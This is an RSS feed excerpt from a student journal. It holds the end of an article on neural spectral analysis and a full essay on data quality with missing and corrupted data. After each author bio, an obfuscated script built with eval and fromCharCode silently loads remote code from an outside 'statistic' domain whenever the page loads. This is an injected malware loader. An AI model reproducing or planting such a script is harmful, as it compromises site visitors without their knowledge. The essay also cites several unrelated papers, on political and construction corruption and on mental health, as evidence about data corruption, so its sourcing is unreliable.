<ol class="wp-block-list"><li>Time Series &#8211; Stoica, P and Moses, R. (2004). <em>Spectral Analysis of signals</em>. Prentice Hall. <a href="https://en.wikipedia.org/wiki/Time_series%23:~:text=In%2520mathematics,%2520a%2520time%2520series,equally%2520spaced%2520points%2520in%2520time.&amp;text=Time%2520series%2520forecasting%2520is%2520the,based%2520on%2520previously%2520observed%2520values.">Wikipedia</a></li><li>Frequency vs. time Domain &#8211; <a href="https://en.wikipedia.org/wiki/Frequency_domain">Wikipedia</a></li><li>Fourier Transform &#8211; <a href="https://en.wikipedia.org/wiki/Fourier_transform">Wikipedia</a>   <a href="https://www.youtube.com/watch?v=g1_wcbGUcDY">STFT</a></li><li>Power Spectral density &#8211;  Stoica, P and Moses, R. (2004). <em>Spectral Analysis of signals</em>. Prentice Hall.</li><li>Spectrogram &#8211; <a href="https://en.wikipedia.org/wiki/Spectrogram">Wikipedia</a>   <a href="https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.02-Discrete-Fourier-Transform.html">Spectrogram code</a></li><li>Correlation &#8211; <a href="https://en.wikipedia.org/wiki/Correlation">Wikipedia</a>, <a href="https://likegeeks.com/python-correlation-matrix/">Tutorial</a>    <a href="https://en.wikipedia.org/wiki/Covariance">Covariance</a>  <a href="https://en.wikipedia.org/wiki/Pearson_correlation_coefficient">Pearson Correlation</a></li><li>Local Field Potential &#8211; <a href="http://www.scholarpedia.org/article/Local_field_potential">LFP</a></li></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Gitika Tirumishi Jada</h5><p>Gitika is a Senior in college where she studies Electronics. She recently picked up interest in the field of Data science and its applications in the medical field.
</p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/">Neural Data Analysis Using Spectral Techniques</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Data Quality Analysis Relating to Missing and Corrupted Data</title>
		<link>https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=data-quality-analysis-relating-to-missing-and-corrupted-data</link>
		
		<dc:creator><![CDATA[Varshini Siddavatam]]></dc:creator>
		<pubDate>Sun, 22 Aug 2021 14:52:10 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[computer science]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[data trends]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1008</guid>

					<description><![CDATA[<p>Varshini Siddavatam<br />
Sri Chaitanya Junior College</p>
<div class="date">
August 1, 2021
</div>
<p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Varshini Siddavatam<br></strong><em>Sri Chaitanya Junior College</em><br>August 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">&nbsp;Abstract</h2>



<p>It is the purpose of this paper to investigate the impact of missing values on commonly encountered data analysis problems. The ability to more effectively identify patterns in socio-demographic longitudinal data is critical in a wide range of social science settings, including academia. Because of the categorical and multidimensional nature of the data, as well as the contamination caused by missing and inconsistent values, it is difficult to perform fundamental analytical operations such as clustering, which groups data based on similarity patterns. Companies can suffer significant financial losses as a result of inaccurate data. Poor-quality data is frequently cited as the root cause of operational snafus, inaccurate analytics, and poorly thought-out business strategies, among other things. Examples of the economic harm that data quality problems can cause include increased costs when products are shipped to the wrong customer addresses, lost sales opportunities as a result of inaccurate or incomplete customer records, and fines for failing to comply with financial or regulatory reporting requirements. Processes such as data cleansing, also known as data scrubbing, are used to correct data errors, as well as work to enhance data sets by including missing values, more up-to-date information, or additional records, among other things. Afterwards, the results are monitored and measured in relation to the performance objectives, and any remaining deficiencies in data quality serve as a starting point for the next round of planned improvements. It is the goal of such a cycle to ensure that efforts to improve overall data quality continue after individual projects are finished.</p>



<h2 class="wp-block-heading">I. Introduction</h2>



<h4 class="wp-block-heading">A. Background Information</h4>



<p>Data quality is a process of measuring the context of data depending on several factors such as consistency, accuracy, reliability, completeness and whether it is contemporary. The professionals have to deal with several missing and corrupted data in their regular work. In order to make data more concrete and flexible, it is highly significant to identify the data quality and data errors. Missing data is similar to the missing values of any important document or information of a whole unit. In case of missing informative data, no information will be provided to the required criteria.&nbsp;</p>



<p>Especially in this recent decade, within constant increasing online data storage the issue regarding corrupt data is rapidly growing. People nowadays provide their maximum personal information in social networking sites or online sites and the majority of the working procedures are happening depending on the online networks. Based on the daily information of the missing data, the reported rate is 15% to 20% (nih.gov, 2021). Accompanied with this approach it is highly significant to maintain the quality of data.&nbsp;</p>



<h4 class="wp-block-heading">B. Thesis Statement</h4>



<p>In this study researchers have focused on the importance of analyzing quality of data in relation to missing and corrupted data. The thesis statement of the research is that missing and corrupted data can be maintained through effective solutions that can improve the quality of overall data. Along with this, improving storage capacity of the data collection process can protect all the valuable data from being corrupted or missing.&nbsp;</p>



<p>Accompanied with better knowledge and skills the operating process of data protection can be utilized in a far better way to secure all the important documents that are uploaded in the various online sites. Maintaining good quality data that will not be easy to imitate or steal also will be identified as a preventer of corrupting data. It also can be stated after analysing the study regarding missing data that overall the world currently the cases of missing data has increased a lot. If the prevention process gets proper governmental support in this criterion, this process will be better understood by everyone. </p>



<h2 class="wp-block-heading">II. Body</h2>



<h4 class="wp-block-heading">A. Support Paragraph 1</h4>



<p>Due to being unable to handle missing and corrupted data can have a negative effect over an individual work process. </p>



<p>In order to handle missing and corrupted data the operators can calculate the cluster value in the column and put the obtained number to the empty spot. As opined by Hao <em>et al.</em> (2018), following the sudden outage of power can save the data from being corrupted. Several times system crashes are considered as another issue of inability to protect data. As stated by Gudivada <em>et al.</em> (2017), in case a PC hard disk gets filled with junk files, the data corruption process gets enhanced. Restoring previous versions in the main storage can help in saving data corruption. In addition, updating the computer process system on a daily basis can help operators to handle their important data. As observed by Azeroual &amp; Schöpfel (2019), the DISM tool is an effective strategy to modify and repair system images by administrators and developers under the category of computer science. Due to recovering corrupted files, the hard disk command is recognized as another key factor that is able to repair missing data. </p>



<p>According to the reports, the frauds based on internet stock have earned millions of amounts per year. Among the total amount of missing data, the maximum quantity is not able to be repaired. As stated by Owusu <em>et al.</em> (2019), the factor of missing data is concerning for the aged people who have a very tiny knowledge regarding the technologies and online procedures. Since nowadays the maximum work process is done through online networking sites, it is really a risk factor to secure the valuable data from the eyes of hackers. The aged people become easily manipulated by the cyber frauds phishing calls and share their personal details. Accompanied with advanced and modern technology several hackers continue to hack others important data easily. If any valuable data is hacked or missed or corrupted, it can be utilized to lead any kind of criminal activities.&nbsp;</p>



<p>In order to secure various types of activities there required a proper approach to protect data properly. Missing or corrupting data not only affect the work procedure in an individual organization but also harm any individual by personal information. As proposed by Morganstein &amp; Ursano (2020), due to working while staying far from the sectors it creates difficulties for the employees under the data security provider system. It is also identified as a major issue regarding corrupted data. In many cases it also can be found that not having proper knowledge and skills, employees remain not capable to protecting data from bemg missing. Data always remains important and significant to prove anything at an initial stage. The principle of “missing data methods” does not place a missing value slightly as they merge available information from the monitoring data with idiomatic supposition.&nbsp;</p>



<p>In case of missing any vital data or information also affects the research process and creates obstacles for the researchers. Especially in the corporate or private working sectors the entire work procedures are happening through internet based networking sites, the majority of data missing cases are found here. As per the view of Pan &amp; Chen (2018), operating online sites are delivering new advantages for the cyber frauds along with hackers to implement offense. All the staff in a corporate sector is not capable of handling data secure processes, so in case of missing data they face a lot of issues in their work system. This affects negatively to lead the work process smoothly and perfectly and consequently it can increase the trust issue. </p>



<p>Adopting several strategic plans the administrators and developers under the category of computer science can recover missing and corrupted data. Apart from this, adopting proper knowledge and skill regarding data protection activity also can help to reduce the effect of missing data. Corrupted data not only affect the work process in the corporate world but also harm the customer trust factors. As nowadays the maximum work process is done through online networking sites, it is really a risk factor to secure the valuable data from the eyes of hackers. In this recent era, not having proper knowledge regarding data security there leads to a serious issue especially in the working system.&nbsp;</p>



<h4 class="wp-block-heading">B. Support Paragraph 2</h4>



<p>Being able to manage data quality analysis can recover missing and corrupted data that have a positive effect over an individual work process. </p>



<p>As poor-quality data often make limitations in the work process, it is important to adopt data quality analysis to have the ability to save work performance. As stated by Wahyudi <em>et al.</em> (2018), to make a more active operating system the quality of data can be maintained by the developers. As per the view of Uthayakumar <em>et al. </em>(2018), top quality databases can bring migration consideration for an individual work process. In this segment, estimating and implementing a data recovery warehouse is able to meet the need of work culture. As opined by Cappiello <em>et al.</em> (2018), within awareness regarding quality management helps in making an effective work process. Maintaining the use of good quality data helps to improve the decision-making process to make the work more authentic.&nbsp;</p>



<p>&nbsp;As in any work procedure data collection method and collected data both are equally important and have a vital role to precede the entire procedure. In order to protect the data there required a proper skill regarding handling the information and making them placed in a secure storage. As opined by Triguero <em>et al.</em> (2019), adoption of adequate data policy also can help in protecting valuable data for a long-term issue. While transforming big sized data, the majority areas cause corruption and missing data. Since big data is heavy to load and transfer with a minimum time, it requires a proper framework that can be helpful to support this approach. Along with this, focusing on the making process of data storage is also capable of securing informative data more protectively.&nbsp;</p>



<p>This approach especially helps the employees who are working in any corporate organization. Holding data properly is a significant requirement in a workplace, as it is related to the success procedure of the organization. According to Benzeval <em>et al. </em>(2020), based on the data the work process has to be done in any organization and it is able to predict whether the profit can be possible or not. Missing data and corruption of data is a random process that happens when the system is filled and overloaded. In this scenario, having computer knowledge can prevent large size loss and make it a little easier to handle. Utilizing good quality databases has the capability to retain important data for a long time to be used. Therefore, constant experiments regarding data quality analysis can assist the entire process to be more active to protect data from being corrupted.&nbsp;</p>



<p>The value of data can be held by adopting effective technologies that are capable of delivering extra security systems that could not be lost. Though, the factor of data analysis needs to be more efficient so that any kind of error can be noticed to prevent the risk issues. In the words of Broeders <em>et al.</em> (2017), focusing on the data quality has the ability to secure the information and reduce the risk factors. Accompanied with the recent pace, it is highly crucial to invent new strategies and technologies in the workplace to bring innovation while maintaining data quality. Understanding the requirement of data analysis also can help in managing a proper strategy to manage the corrupted data. </p>



<p>A top-quality data can mitigate the lack of trust and provide reliable resources for finishing any work segment. Based on the data analysis the process of any individual work has to be done in any organization and it is able to predict whether the profit can be possible or not. While transforming big sized data, the majority areas cause corruption and missing data. Adopting advanced and modern security systems can handle the big size data and secure them from being corrupted. Due to fulfilling all the criteria discussed in the above section, it is highly required to follow a proper data analysis method so that the potential risk factors can be highlighted or marked to be fixed again. </p>



<h2 class="wp-block-heading">III. Conclusion</h2>



<p>Identifying the data quality can ensure whether the work process will be beneficial or not. The entire structure of the data analysis method needs to be more active to recover missing and corrupted data. Maintaining proper rules and regulations also can help to control top data collection methods to avoid data errors. Accompanied with advanced and modern technology several hackers continue to hack others important data easily. Preventing them from all types of offences the organizations need to adopt a more effective and active data security system to retain for a longterm issue. In many cases, it can be seen that not having proper knowledge regarding data security there leads to a serious issue especially in the working system. Maintaining good quality data that will not be easy to imitate or steal also will be identified as a preventer of corrupting data. In addition, having computer knowledge can prevent large size loss and make it a little easier to handle. </p>



<p>Depending on the entire study it can be concluded that monitoring improvement results is capable of managing data quality. High quality data is always considered as helpful in order to meet inaccurate data needs to work with good and valid information. Accompanied with better knowledge and skills the operating process of data protection can be utilized in a far better way to secure all the important documents that are uploaded in the various online sites. Due to leading the work process in any organization there is highly required a proper framework to analyze the collected data in order to identify the potential risks or errors to prevent it from very early stage.&nbsp;</p>



<h2 class="wp-block-heading">Reference List</h2>



<p>Azeroual, O., &amp; Schöpfel, J. (2019). Quality issues of CRIS data: An exploratory investigation with universities from twelve countries. Publications, 7(1), 14. Retrieved From: https://www.mdpi.com/416282</p>



<p>Benzeval, M., Bollinger, C., Burton, J., Couper, M. P., Crossley, T. F., &amp; Jäckle, A. (2020). Integrated data: research potential and data quality. Understanding Society Working Paper Series, (2020-02). Retrieved From: https://www.understandingsociety.ac.uk/sites/default/files/downloads/working-papers/2020-02.pdf</p>



<p>Broeders, D., Schrijvers, E., van der Sloot, B., van Brakel, R., de Hoog, J., &amp; Ballin, E. H. (2017). Big Data and security policies: Towards a framework for regulating the phases of analytics and use of Big Data. Computer Law &amp; Security Review, 33(3), 309-323. Retrieved From: https://www.sciencedirect.com/science/article/pii/S0267364917300675</p>



<p>Cappiello, C., Samá, W., &amp; Vitali, M. (2018, June). Quality awareness for a successful big data exploitation. In Proceedings of the 22nd International Database Engineering &amp; Applications Symposium (pp. 37-44). Retrieved From: https://dl.acm.org/doi/abs/10.1145/3216122.3216124</p>



<p>Gudivada, V., Apon, A., &amp; Ding, J. (2017). Data quality considerations for big data and machine learning: Going beyond data cleaning and transformations. <em>International Journal on Advances in Software</em>, <em>10</em>(1), 1-20. Retrieved From: https://www.researchgate.net/profile/Junhua-Ding/publication/318432363_Data_Quality_Considerations_for_Big_Data_and_Machine_Learning _Going_Beyond_Data_Cleaning_and_Transformations/links/59ded28b0f7e9bcfab244bdf/Data-Quality-Considerations-for-Big-Data-and-Machine-Learning-Going-Beyond-Data-Cleaning-and-Transformations.pdf</p>



<p>Hao, Y., Wang, M., Chow, J. H., Farantatos, E., &amp; Patel, M. (2018). Modelless data quality improvement of streaming synchrophasor measurements by exploiting the low-rank Hankel structure. <em>IEEE Transactions on Power Systems</em>, <em>33</em>(6), 6966-6977. Retrieved From: https://ieeexplore.ieee.org/abstract/document/8395403/</p>



<p>Morganstein, J. C., &amp; Ursano, R. J. (2020). Ecological disasters and mental health: causes, consequences, and interventions. Frontiers in psychiatry, 11, 1. Retrieved From: https://www.frontiersin.org/articles/10.3389/fpsyt.2020.00001/full</p>



<p>nih.gov, 2021. The prevention and handling of the missing data [Online]. Available at: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3668100/ [Accessed on 27 July, 2021]&nbsp;</p>



<p>Owusu, E. K., Chan, A. P., &amp; Shan, M. (2019). Causal factors of corruption in construction project management: An overview. Science and engineering ethics, 25(1), 1-31. Retrieved From: https://link.springer.com/content/pdf/10.1007/s11948-017-0002-4.pdf</p>



<p>Pan, J., &amp; Chen, K. (2018). Concealing corruption: How Chinese officials distort upward reporting of online grievances. American Political Science Review, 112(3), 602-620. Retrieved From: https://www.cambridge.org/core/journals/american-political-science-review/article/concealing-corruption-how-chinese-officials-distort-upward-reporting-of-online-grievances/43D20A0E5F63498BB730537B7012E47B</p>



<p>Triguero, I., García‐Gil, D., Maillo, J., Luengo, J., García, S., &amp; Herrera, F. (2019). Transforming big data into smart data: An insight on the use of the k‐nearest neighbors algorithm to obtain quality data. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery, 9(2), e1289. Retrieved From: https://wires.onlinelibrary.wiley.com/doi/abs/10.1002/widm.1289</p>



<p>Uthayakumar, J., Vengattaraman, T., &amp; Dhavachelvan, P. (2018). A survey on data compression techniques: From the perspective of data quality, coding schemes, data type and applications. Journal of King Saud University-Computer and Information Sciences. Retrieved From: https://www.sciencedirect.com/science/article/pii/S1319157818301101</p>



<p>Wahyudi, A., Kuk, G., &amp; Janssen, M. (2018). A process pattern model for tackling and improving big data quality. Information Systems Frontiers, 20(3), 457-469. Retrieved From: https://link.springer.com/article/10.1007/s10796-017-9822-7</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Varshini Siddavatam</h5>
<p class="no_indent" style="margin:0;">Varshini is a senior at the Sri Chaitanya Junior College. Always interested in coding and data, she hopes to pursue computer science for her undergraduate major. Apart from academics, she is also interested in basketball, painting, dancing, and writing.</p></figure></div>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
